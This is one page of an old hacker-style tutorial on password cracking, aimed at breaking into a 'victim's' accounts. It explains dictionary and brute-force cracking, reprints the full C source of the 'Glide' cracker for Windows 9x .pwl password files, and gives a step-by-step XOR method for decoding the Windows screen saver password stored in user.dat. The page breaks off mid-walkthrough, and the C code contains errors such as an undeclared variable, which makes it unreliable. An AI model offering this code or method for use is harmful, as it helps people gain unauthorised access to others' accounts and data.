Password Cracking
Decrypted 1
PAGE
1, 2,
3
All of you would probably must have come across the term 'password'. Ever wondered why exactly passwords work and how to crack them? Well, this manual will answer all your queries about passwords and make you an expert in cracking passwords.
Passwords: An Introduction
First of all, what exactly is a password. A password is best described as a verification or an authentication tool or object. Passwords are used to ensure legal and proper access to only those people who have the authority or the permission to view the data. A password is required in many places, you are required a password, to access your Inbox, you are required a password to dial up to your Internet Service Provider and in some organizations you also need to enter a password to start the system. At all places the Username and Password pair is used to authenticate the
user. Usernames are used to identify the user and the password is used to authenticate the user and for every unique username there is a unique password. Take the example of the Lock and Key, for every lock you need a unique key to open it and enter. Here the Lock acts as the Username and the password would be the key. So passwords are as important as the key of your house.
Your house remains safe as long as only you who is the rightful owner has the key and no one else finds it. Similarly, the concept behind passwords is that it is only the rightful owner who knows the password and no one else knows it. Everyday we hear about password stealing, computer break-ins etc. Sometimes the user chooses
very lame passwords which are easily guessed by hackers. There
are certain guidelines which I would like to tell you which you must keep in mind while choosing a password:
1. Never keep your password same as your Username
2. Never choose your own name, Date of Birth, spouse's name, pet's name, child's name etc as your password,
those are the first ones which are tried by a hacker.
3. Some people are so lazy that they keep their password to be 'Enter' (Carriage return)
4. Try to choose a word which is not in the dictionary and contains both numbers and alphabets, and if possible use both Lower Case and Upper Case alphabets and also symbols like (#,$,%,^ etc) as they can be cracked only be brute force password crackers which take too long a time to crack.
You may say that choosing of weak passwords is responsible for the large number of hacks, but people themselves are the weakest chain in the whole authentication process. Most people usually use lame passwords like those I mentioned above, and those who use excellent passwords are not able to remember them and then write the password down on a piece of paper and stick it on their monitor. One should try his level best to remember weird passwords if he wants to keep his system secure. The best places where you can find the passwords, would be beneath the keyboard, behind the CPU or even on the sides of the monitor. Some people have trouble remembering the large number of passwords that they are asked for, while using various services, as a result they use the same password everywhere. Thus knowing even a single password might help in some cases.
Password Cracking
The most common method of password cracking is password guessing, although it requires a lot of luck, it can be successful sometimes. To start to guess the password, you first need to gather all kinds of info about the
victim. (See the Guidelines of keeping a password for more details.)
The most common and the most successful method of password cracking
is the use of password crackers. Now what exactly are password crackers? Now to understand what a password cracker is and how it works, you first need to understand how a person is authenticated.
When you are creating a new account or registering or running the
setup basically whenever you create a new account by entering the Username and Password.) you might be asked for the Username and Password. The username is mostly stored in plaintext, but the password that you enter is stored in an encrypted form. Now when you enter
the password, it is passed through a pre defined algorithm and is thus encrypted and is stored on the hard disk. So next time when you use the account and enter the password, the text (password) you type is passed through the same algorithm and is compared with the earlier stored value.
If they both match, the user is authenticated else the authentication fails.
The algorithm that is used to encrypt the password is a one way algorithm, by that I mean that if we pass the encrypted password through the reverse algorithm, we will not get the original plaintext password.
Let's take an example to make it clearer: Say your plaintext
password is xyz123 and it is passed through an algorithm and stored in the file as 0101027AF. Now if you get his encrypted password and know the algorithm which xyz123 is passed through to get 0101027AF, you cannot reverse the algorithm to get xyz123 from 0101027AF.
When you are typing in your password, the computer does not display it in plaintext but instead shows only stars i.e. ******** so that if someone is shoulder surfing, he cannot find out the password. The text box has been programmed in such a way. On most forms Unix you will not even see the asterix marks and the cursor will not move, so that neither does a person shoulder surfing, find out the password nor does he find out the length of the password.
Password Crackers are of two different types -: Brute Force and Dictionary Based.
Dictionary Based password Crackers try out all passwords from a given pre defined dictionary list to crack a password. These are faster but more often than not are unsuccessful and do not return the password. As they do not try out all combinations of possible keys, they are unable to crack those passwords which have symbols or numbers in between.
Brute Force Password Crackers try out all combinations of all keys which can be found in the
keyboard (i.e. Symbols, Numbers, Alphabets) both Lower Case and Upper Case. These kinds of Password Crackers have a greater success rate but take a long time to crack the password. As they take all possible keys into consideration, they are more effective.
Now that you know the two main types of password crackers lets see how they work.
As passwords are encrypted by a one way algorithm, password crackers do not extract the password from the file but instead take the combination of letters, encrypt them by passing the characters through the original algorithm and compare this value with the stored encrypted value. If these two match, then the password cracker displays the password in plaintext.
Cracking The Windows Login Password
The Windows ( 9x) password is passed through a very weak algorithm and is quite easy to crack.
Windows stores this login password in *.pwl files in the c:\windows directory. The .pwl files have the filename which is the username corresponding to the password stored by it. A typical .pwl file would be as follows:
Note: This .pwl file has been taken from a Win98 machine running IE 5.0
###############CUT HERE##############
у‚...-џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ
џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ
џџџџџџ
џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ
џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ
џџџџџџ
џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ
џџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџџ
џџџR
p u.аX+|rаq"Б/2Г ЪхЁhCJ‚D з `ЭYЅ!эx}(qWЄуЦБ<!?рм6šс˜єц4+\3/4ѕ+%EАЫд§mЧд оIЛ‚ B рзœја...'@############CUT HERE#############
Let's go through the contents of this .pwl file. I am not sure what the first line signifies, but my guess would be that it is the Name to which the computer is registered to. The next four lines have just been entered by Windows andare not readable. The last two lines is the password but in the encrypted form. There is no way to get the plaintext password by just studying the Windows algorithm and these lines. To actually crack the password you need a simple but kewl cracker coded in C called Glide. I have included the code below. If you have a sound C knowledge you can study the code and actually experience how a password cracker works and how a password is encrypted in Windows i.e. more about the Windows encryption algorithm.
*********************
Newbie Tip: All exploits, crackers, mail bombers practically everything related with Hacking has been written in either Perl or C. If you really want to beconsidered an elite hacker, you have to know how to program, without a sound knowledge of either C (C++) or Perl you cannot hack successfully. Almost all exploits available on the net have an important part edited or missing, without which it has no use. Some exploits may be needed to be edited in order to be run in your platform. In order to do all this programming is needed.
********************
#include <stdio.h>
#include <string.h>
#include <process.h>
#include <stdlib.h>
#include <ctype.h>
#include <conio.h>
unsigned char huge Data[100001];
unsigned char keystream[1001];
int Rpoint[300];
void main (int argc,char *argv[]) {
FILE *fd;
int i,j,k;
int size;
char chi;
char *name;
int cracked;
int sizemask;
int maxr;
int rsz;
int pos;
int Rall[300]; /* recource allocation table */
if (argc<2) {
printf("usage: glide filename (username)");
exit(1);
}
/* read PWL file */
fd=fopen(argv[1],"rb");
if(fd==NULL) {
printf("can't open file %s",argv[1]);
exit(1);
}
size=0;
while(!feof(fd)) {
Data[size++]=fgetc(fd);
}
size--;
fclose(fd);
/* find username */
name=argv[1];
if(argc>2) name=argv[2];
printf("Username: %s\n",name);
/* copy encrypted text into keystream */
cracked=size-0x0208;
if(cracked<0) cracked=0;
if(cracked>1000) cracked=1000;
memcpy(keystream,Data+0x208,cracked );
/* generate 20 bytes of keystream */
for(i=0;i<20;i++) {
ch=toupper(name[i]);
if(ch==0) break;
if(ch=='.') break;
keystream[i]^=ch;
};
cracked=20;
/* find allocated recources */
sizemask=keystream[0]+(keystream[1]<<8);
printf("Sizemask: %04X\n",sizemask);
for(i=0;i<256;i++) Rall[i]=0;
maxr=0;
for(i=0x108;i<0x208;i++) {
if(Data[i]!=0xff) {
Rall[Data[i]]++;
if (Data[i]>maxr) maxr=Data[i];
}
}
maxr=(((maxr/16)+1)*16); /* recource pointer table size appears to be
divisable by
16 */
/* search after recources */
Rpoint[0]=0x0208+2*maxr+20+2; /* first recource */
for(i=0;i<maxr;i++) {
/* find size of current recource */
pos=Rpoint[i];
rsz=Data[pos]+(Data[pos+1]<<8);
rsz^=sizemask;
printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i,Rall[i]);
if( (Rall[i]==0) && (rsz!=0) ) {
printf("unused resource has nonzero size !!!\n");
printf("If last line produced any : You may try to
recover\n");
printf("press y to attempt recovery\n");
ch=getch();
if(ch!='y') exit(0);
rsz=2;
i-=1;
}
pos+=rsz;
/* Resources have a tendency to have the wrong size for some reason
*/
/* check for correct size */
if(i<maxr-1) {
while(Data[pos+3]!=keystream[1]) {
printf(":",Data[pos+3]);
pos+=2; /* very rude may fail */
}
}
pos+=2; /* include pointer in size */
Rpoint[i+1]=pos;
}
Rpoint[maxr]=size;
/* insert Table data into keystream */
for(i=0;i <= maxr;i++) {
keystream[20+2*i]^=Rpoint[i] & 0x00ff;
keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;
}
cracked+=maxr*2+2;
printf("%d bytes of keystream recovered\n",cracked);
/* decrypt resources */
for(i=0;i < maxr;i++) {
rsz=Rpoint[i+1]-Rpoint[i];
if (rsz>cracked) rsz=cracked;
printf("Recource[%d] (%d)\n",i,rsz);
for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);
printf("\n");
}
exit(0);
}
Windows Screen Saver Password
This is an interesting hack and not many people know about it. This requires no canned hacking tool, we will crack the password manually!!! First of all, why do we need to crack the Windows Screen Saver? How does it restrict us? If a Screen Saver is password protected, then whenever it is turned on, then in order to turn it off, you need to enter a password. It does not allow us to do anything on a system until and unless we enter the password. We will keep seeing the screen saver until we authenticate ourselves by entering the password. No not even CTRL+ALT+DEL works in this case. An average user encounters around 20 different places where he needs to type in the password. Most people findit very difficult to remember even more than a single password, hence to make life easier for themselves, they use the same password in all the places. And also on some systems the Login password is same as the Screen Saver Password. Hence it is very useful to crack the Screen Saver Password.
Now let's move onto cracking the Screen Saver Password. For this example, protect your screen saver with the password, 'DOPE'. Windows stores the Screen Saver password in the user.dat file in the Windows directory. If you have multiple profiles on your system then it is stored in the user.dat file in the c:\windows\profiles\username directory.(On Win 3x systems it is stored in the control.ini file). The user.dat file constitutes the registry of the Windows system, thus we can say that the Windows Screen Saver Password is stored in the registry. First of all, you need to change the attributes of this file and make it editable by right clicking on it and unselecting the Read Only Option else you will not be able to edit it.
Once this is done, open this file in WordPad (Any text editor will do except MS WORD And Notepad.)Now look for the string: ScreenSave_Data
You will find an even number of characters after Data, this is the Screen Saver Password encrypted and stored in the hex system. Each pair or hex values represent a single ASCII plain text character. This means that if there are 10 hex values then the password is of 5 characters, each pair of Hex values standing for a single plaintext ASCII character. So in order to get the Plaintext password you just need to decrypt these hex values into ASCII.
There are many screen Saver Password decrypters around which decode the password for you but I believe that it would be better if we could do it manually without using a third party canned hacking tool. And hey it is really simple once you get the hang of it. The only thing you need to know is the various number systems. This means that you need to know The Hex system, The Decimal System and also The Binary System.
For example ASCII character 'A' is 41h(ex), 65 Dec(imal) and 01000001 binary.
One could also get hold of a good ASCII chart which has all the number systems and their conversions. Make sure that the ASCII chart you get has Hex, Decimal, Binary and of course plaintext ASCII.
XOR
Before I go on let me introduce you to XOR. The following is the chart you need to refer to when you need to evaluate the XOR value.
input value A | input value B | Output
+--------------------------------------+
| 0 | 0 | 0 |
| 0 | 1 | 1 |
| 1 | 0 | 1 |
| 1 | 1 | 0 |
+--------------------------------------+
Example
Question: Answer:
00001100 00001100
00101001 00101001
-------- <--XOR -------- <--XOR
???????? 00100101
You may ask how did that happen? Well it's easy. Take the case of the first digits. The Input Value A is 0 and the Input Value B is also 0. Now refer to the XOR chart. You find that the Output when both the Input values are 0 is also 0. Similarly consider the third values. Input Value A is 0 and the Input value B is 1. If we refer to the XOR chart, we find that the Output is 1. However the conventional method is to start from the right, as we are taught in school.
**********************
Hacking Truth: The Screen Saver Password cannot be longer than 14 characters because if it is longer the system will not either prompt for the password or will hang and reboot.
**********************
It's an even string containing letters and numbers. This is your password. If you've read everything you should have changed your password to 'DOPE' which is 4 characters long, and your encrypted password is 8 characters long, (0CA12658)Hmmm. so D O P E is the same as 0C A1 26 58.
So
D= 0C
O= A1
P= 26
E= 58
Am I right? Ok, and now listen carefully; the 0 represents 4 and C represents 4 too after decryption. Put those two number together and you get 44(h). This is the way you have to do that, with every decrypted couple.
Ok grab an ASCII table and look at 44 HEX. That's 'D' like in DOPE know what I mean?
So now I'll show you how to get the encryption scheme:
0C --> 44h --> ASCII char 'D'
That means 0 --> 4
C --> 4
ok, now the binary
0 = 00000000
????????
-------- <--XOR
4 = 00000100
Can you still follow me? It might sound a bit weird, but trust me, it is quite simple. Read it again to make it clear.
0 = 00000000
00000100
-------- <--XOR
4 = 00000100
Ok now you know that for the first part 00000100 is used
to decrypt the password, right? But with the second one it
goes different. Then the second part of the hex number, ok C must become 4 too,
so that's easy ;
C = 00001100
????????
--------
4 = 00000100
After performing XOR you will get
C = 00001100
00001000 <-- we found our encryption scheme for the second char and
-------- of the first encrypted character
4 = 00000100
Ok, so far so good, we now know how 0C gets decrypted to
'D' and that the second part uses 00001000
So we must check if it really works. Yeah. So we'll check it, change your password to 'ERIKA' and the string in the user.dat will be 0DBC3F5626. Ok, 0D = E so check it out,
0 = 00000000
00000100 <-- Found decryption scheme
-------- <-- XOR
00000100 <-- 4!
D = 00001101
00001000 <-- Found decryption scheme
-------- <-- XOR
00000101 <-- 5!
So combine the 2 answers and you'll get 45! 45 HEX is ASCII 'E'!! Just like in 'ERIKA'! So we now know how to decrypt the 1 letter/number of a password! BUT, as you see and as you know I'll repeat this all shortly.
The first password was DOPE with a first character 'D' the 'D' was encrypted as '0C'. We knew that those two characters represented the Hex code of the ASCII code 'D', 44! So that means that 0C has to become 44, we did that with XOR and to make 0 a 4 you had to use 00000100, and to make C a 4 you needed to use 00001000. So that means That if you don't know the decrypted password, but you found '0D'as first two characters of the password you need to use the same two binary numbers, 00000100 and 00001000. So you did that and 0 came out as 4, which is logical, and D came out as 5, using 00001000.
Encrypted password:
09 AC 35 59 22 2F E6 53 33 C6 0C B4 19 DB
Decrypting...
+-----------+
[09] AC 35 59 22 2F E6 53 33 C6 0C B4 19 DB
0=
00000000
00000100 <--- We found that one earlier
--------XOR
00000100 = 4
9=
00001001
00001000 <--- This one too
--------XOR
00000001 = 1
09 = 41 = A
Password until now: A
~
09 [AC] 35 59 22 2F E6 53 33 C6 0C B4 19 DB
A=
00001010
00001110 <--- You didn't knew this one yet, did you? hehehe
--------XOR
00000100 = 4
C=
00001100
00001110
--------XOR
00000010 = 2
AC = 42 = B
Password until now: AB
~
contd...
PAGE
1, 2,
3
TOP |
